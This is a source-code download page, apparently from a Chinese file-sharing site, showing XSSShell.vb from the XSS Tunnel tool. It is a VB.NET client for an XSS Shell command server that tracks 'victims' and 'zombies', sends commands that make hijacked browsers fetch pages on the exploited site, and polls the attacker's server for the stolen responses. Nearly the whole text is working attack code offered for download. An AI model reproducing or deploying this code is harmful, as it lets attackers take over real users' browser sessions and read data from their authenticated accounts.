开通博客赚积分
发布资源赚积分
分类

源码开发语言/平台
当前位置:首页 > 源码/资料 > 系统/网络安全 > 破解 > 查看源码
XSSShell.vb
资源名称:xssshell.rar [点击查看]
上传用户:wangting
上传日期:2020-01-24
资源大小:2226k
文件大小:11k
源码类别:

破解

开发平台:

ASP/ASPX

XSSShell.vb:源码内容
  1. #Region "GPL License"
  3. 'This file is part of XSS Tunnel.
  4. '
  5. 'XSS Tunnel, XSS Tunneling tool 
  6. 'Copyright (C) 2007 Ferruh Mavituna
  8. 'This program is free software; you can redistribute it and/or
  9. 'modify it under the terms of the GNU General Public License
  10. 'as published by the Free Software Foundation; either version 2
  11. 'of the License, or (at your option) any later version.
  13. 'This program is distributed in the hope that it will be useful,
  14. 'but WITHOUT ANY WARRANTY; without even the implied warranty of
  15. 'MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  16. 'GNU General Public License for more details.
  18. 'You should have received a copy of the GNU General Public License
  19. 'along with this program; if not, write to the Free Software
  20. 'Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.
  21. #End Region
  23. Imports System.Net
  24. Imports System.Threading
  25. Imports System.Text
  27. ''' <summary>
  28. ''' XSS Shell Server
  29. ''' </summary>
  30. ''' <remarks></remarks>
  31. Public Class XSSShell
  33. #Region "Constants"
  35.     ''' <summary>
  36.     ''' Broadcast for all zombies)
  37.     ''' </summary>
  38.     ''' <remarks></remarks>
  39.     Public Const BroadCastVictim As Integer = 336699
  41.     ''' <summary>
  42.     ''' Default page for getting data
  43.     ''' </summary>
  44.     ''' <remarks></remarks>
  45.     Private Const DefaultDataPage As String = "showdata.asp"
  47.     ''' <summary>
  48.     ''' Default Push Command Page
  49.     ''' </summary>
  50.     ''' <remarks></remarks>
  51.     Private Const DefaultCommandPage As String = "save.asp"
  54.     ''' <summary>
  55.     ''' Default XSS Shell Server Password
  56.     ''' </summary>
  57.     ''' <remarks></remarks>
  58.     Private Const DefaultPassword As String = "w00t"
  61.     ''' <summary>
  62.     ''' Default Command Seperator (so dirty!)
  63.     ''' </summary>
  64.     ''' <remarks></remarks>
  65.     Public Shared CommandSeperator As String = "|,|"
  67. #End Region
  69. #Region "Properties"
  72.     Private _VictimId As Integer = -1
  73.     ''' <summary>
  74.     ''' Controlled Victim 
  75.     ''' </summary>
  76.     ''' <value></value>
  77.     ''' <returns></returns>
  78.     ''' <remarks></remarks>
  79.     Public Property VictimId() As Integer
  80.         Get
  81.             UpdateVictim()
  82.             Return _VictimId
  83.         End Get
  84.         Set(ByVal value As Integer)
  85.             _VictimId = value
  86.         End Set
  87.     End Property
  89.     ''' <summary>
  90.     ''' Update Victim if required
  91.     ''' </summary>
  92.     ''' <remarks></remarks>
  93.     Private Sub UpdateVictim()
  94.         If _VictimId <= 10 Then _VictimId = GetLatestVictim()
  95.     End Sub
  97.     Private _IsVictimAlive As Boolean
  98.     ''' <summary>
  99.     ''' Is Victim Alive ?
  100.     ''' </summary>
  101.     ''' <value></value>
  102.     ''' <returns></returns>
  103.     ''' <remarks></remarks>
  104.     Public Property IsVictimAlive() As Boolean
  105.         Get
  106.             UpdateVictim()
  107.             Return _IsVictimAlive
  108.         End Get
  109.         Set(ByVal value As Boolean)
  110.             _IsVictimAlive = value
  111.         End Set
  112.     End Property
  115.     ''' <summary>
  116.     ''' Get Latest Victim from Server
  117.     ''' </summary>
  118.     ''' <returns></returns>
  119.     ''' <remarks></remarks>
  120.     Private Function GetLatestVictim() As Integer
  121.         Dim victimUri As New Uri(Me.Server, "?c=3&pass=" & Me.Password)
  122.         Dim VictimId As Integer = ReadPageStatus(victimUri)
  124.         Me.IsVictimAlive = (VictimId > 10)
  126.         Return VictimId
  127.     End Function
  129.     ''' <summary>
  130.     ''' Read page and return results as integer
  131.     ''' </summary>
  132.     ''' <param name="uri"></param>
  133.     ''' <returns>-1 if not able to read page otherwise page response</returns>
  134.     ''' <remarks></remarks>
  135.     Private Function ReadPageStatus(ByVal uri As Uri) As Integer
  137.         Dim RetStatus As Integer
  138.         If Not Integer.TryParse(ReadPage(uri), RetStatus) Then
  139.             RetStatus = -1
  140.         End If
  142.         Return RetStatus
  143.     End Function
  146.     Private _ServerData As Uri
  147.     ''' <summary>
  148.     ''' XSS Shell Server Data for Getting Results
  149.     ''' </summary>
  150.     ''' <value></value>
  151.     ''' <returns></returns>
  152.     ''' <remarks></remarks>
  153.     Public Property ServerData() As Uri
  154.         Get
  155.             If _ServerData Is Nothing Then _ServerData = New Uri(Server, DefaultDataPage)
  156.             Return _ServerData
  157.         End Get
  158.         Set(ByVal value As Uri)
  159.             _ServerData = value
  160.         End Set
  161.     End Property
  164.     Private _Server As Uri
  165.     ''' <summary>
  166.     ''' XSS Shell Server Uri
  167.     ''' </summary>
  168.     ''' <value></value>
  169.     ''' <returns></returns>
  170.     ''' <remarks></remarks>
  171.     Public Property Server() As Uri
  172.         Get
  173.             If _Server Is Nothing Then Throw New ArgumentNullException("Server should supplied !")
  174.             Return _Server
  175.         End Get
  176.         Set(ByVal value As Uri)
  177.             _Server = value
  178.         End Set
  179.     End Property
  182.     Private _ServerCommand As Uri
  183.     ''' <summary>
  184.     ''' Page to send commands
  185.     ''' </summary>
  186.     ''' <value></value>
  187.     ''' <returns></returns>
  188.     ''' <remarks></remarks>
  189.     Public Property ServerCommand() As Uri
  190.         Get
  191.             If _ServerCommand Is Nothing Then _ServerCommand = New Uri(Server, DefaultCommandPage)
  192.             Return _ServerCommand
  193.         End Get
  194.         Set(ByVal value As Uri)
  195.             _ServerCommand = value
  196.         End Set
  197.     End Property
  200.     Private _Password As String
  202.     ''' <summary>
  203.     ''' XSS Shell Server Password
  204.     ''' </summary>
  205.     ''' <value></value>
  206.     ''' <returns></returns>
  207.     ''' <remarks></remarks>
  208.     Public Property Password() As String
  209.         Get
  210.             Return _Password
  211.         End Get
  212.         Set(ByVal value As String)
  213.             _Password = value
  214.         End Set
  215.     End Property
  217. #End Region
  219. #Region "Commands"
  221.     ''' <summary>
  222.     ''' Get Uri for GetURL Command with Post Data
  223.     ''' </summary>
  224.     ''' <param name="path">Relative or absolute path to target URL (should be same with XSSed host)</param>
  225.     ''' <param name="postData">Post Data</param>
  226.     ''' <returns></returns>
  227.     ''' <remarks></remarks>
  228.     Private Function NewGetUrlCommand(ByVal path As String, ByVal postData As String) As Uri
  230.         'Add Post Request if exist
  231.         If postData IsNot Nothing Then
  232.             path &= CommandSeperator & postData
  233.         End If
  235.         Dim RetUri As Uri = New Uri(Server, Me.ServerCommand.AbsoluteUri & "?" & GetStandardParameters() & "&c=12&p=" & Web.HttpUtility.UrlEncode(path))
  237.         Return RetUri
  238.     End Function
  240.     ''' <summary>
  241.     ''' Get Uri for GetURL Command
  242.     ''' </summary>
  243.     ''' <param name="path">Relative or absolute path to target URL (should be same with XSSed host)</param>
  244.     ''' <returns></returns>
  245.     ''' <remarks></remarks>
  246.     Private Function NewGetUrlCommand(ByVal path As String) As Uri
  247.         Return NewGetUrlCommand(path, Nothing)
  248.     End Function
  250. #End Region
  252. #Region "Helpers"
  255.     ''' <summary>
  256.     ''' Get standard parameters which will be added to all requests like Password and VictimId
  257.     ''' </summary>
  258.     ''' <returns></returns>
  259.     ''' <remarks></remarks>
  260.     Private Function GetStandardParameters() As String
  261.         Return "pass=" & Me.Password & "&v=" & Me.VictimId.ToString
  262.     End Function
  264.     ''' <summary>
  265.     ''' Read a Web Resource
  266.     ''' </summary>
  267.     ''' <param name="uri"></param>
  268.     ''' <returns>Returns page source if successed else returns Nothing</returns>
  269.     ''' <remarks></remarks>
  270.     Private Shared Function ReadPage(ByVal uri As Uri) As String
  272.         'Debug.WriteLine("Request : " & uri.AbsoluteUri)
  274.         Dim HttpReader As New HttpReader(uri)
  275.         Dim Ret As String = HttpReader.Request()
  277.         Return Ret
  278.     End Function
  280. #End Region
  282. #Region "Proxy Actions"
  284.     ''' <summary>
  285.     ''' Check XSS Shell server working and suitable for XSS Shell Proxy Connections
  286.     ''' </summary>
  287.     ''' <returns></returns>
  288.     ''' <remarks></remarks>
  289.     Public Function CheckServer() As Boolean
  291.         Dim Response As Integer = Me.VictimId
  292.         If Integer.TryParse(ReadPage(New Uri(Server, "?XSSSHELLPROXY=1")), Response) Then
  293.             Return (Response = 13)
  294.         End If
  296.         Return False
  297.     End Function
  301.     ''' <summary>
  302.     ''' Send Request Command and get Response
  303.     ''' </summary>
  304.     ''' <param name="path">Relative or absolute path to target URL (should be same with XSSed host)</param>
  305.     ''' <param name="postData">Post Data</param>
  306.     ''' <returns>HTML Response from target. Nothing if it failed</returns>
  307.     ''' <remarks></remarks>
  308.     Public Function SendGetUriCommand(ByVal path As String, Optional ByVal postData As String = Nothing) As HttpResponse
  309.         Dim SendUri As Uri = NewGetUrlCommand(path, postData)
  311.         Dim XSSShellResponse As String = XSSShell.ReadPage(SendUri)
  312.         Dim AttackId As Integer
  314.         If Not Integer.TryParse(XSSShellResponse, AttackId) Then
  315.             Return Nothing
  316.         End If
  318.         'If it's lower than 10 error
  319.         If AttackId < 10 Then
  320.             Return Nothing
  321.         End If
  323.         'Wait for response
  324.         Return GetResponse(AttackId)
  325.     End Function
  327.     ''' <summary>
  328.     ''' Get Response from XSS Shell Server
  329.     ''' </summary>
  330.     ''' <param name="AttackId">Associated AttackId</param>
  331.     ''' <returns></returns>
  332.     ''' <remarks></remarks>
  333.     Private Function GetResponse(ByVal AttackId As Integer) As HttpResponse
  335.         Dim MaxRetry As Integer = 30
  336.         Dim DataUri As Uri = New Uri(Server, Me.ServerData.AbsoluteUri & "?" & GetStandardParameters() & "&m=2&i=" & AttackId.ToString)
  338.         Dim Response As String
  339.         Do
  340.             Thread.Sleep(1000)
  341.             Response = ReadPage(DataUri)
  342.             MaxRetry -= 1
  343.         Loop While Response = "NO_RECORD" AndAlso MaxRetry > 0
  345.         If MaxRetry = 0 Then
  346.             Debug.WriteLine("ERR: Retry timeout!")
  347.             Return Nothing
  348.         End If
  350.         If Not Response Is Nothing Then
  352.             Response = Web.HttpUtility.UrlDecode(Response)
  354.             'Fix Js Newlines
  355.             Response = Response.Replace(Chr(10), vbNewLine)
  357.             'Content Start Position
  358.             Dim BodyPos As Integer = Response.IndexOf(vbNewLine & vbNewLine)
  360.             'Wrong Response (no content)
  361.             If BodyPos = -1 Then
  362.                 Debug.WriteLine("ERR: There is no double newline for content start")
  363.                 Return Nothing
  364.             End If
  366.             'Generate Http Response
  367.             Dim RawHeaders As String = Response.Substring(0, BodyPos)
  368.             Dim BodyBinary As String = Response.Substring(BodyPos + 6, Response.Length - (BodyPos + 6))
  369.             Dim HttpParser As New HttpParser(RawHeaders, XSSTunnelLib.HttpParser.DecodeBinary(BodyBinary))
  371.             Return HttpParser.HttpResponse
  372.         End If
  374.         Debug.WriteLine("ERR: Response is Nothing")
  375.         Return Nothing
  376.     End Function
  378. #End Region
  380. #Region "Constructors"
  382.     Public Sub New(ByVal server As String, ByVal password As String)
  383.         Me.Server = New Uri(server)
  384.         Me.Password = password
  385.     End Sub
  387. #End Region
  389. End Class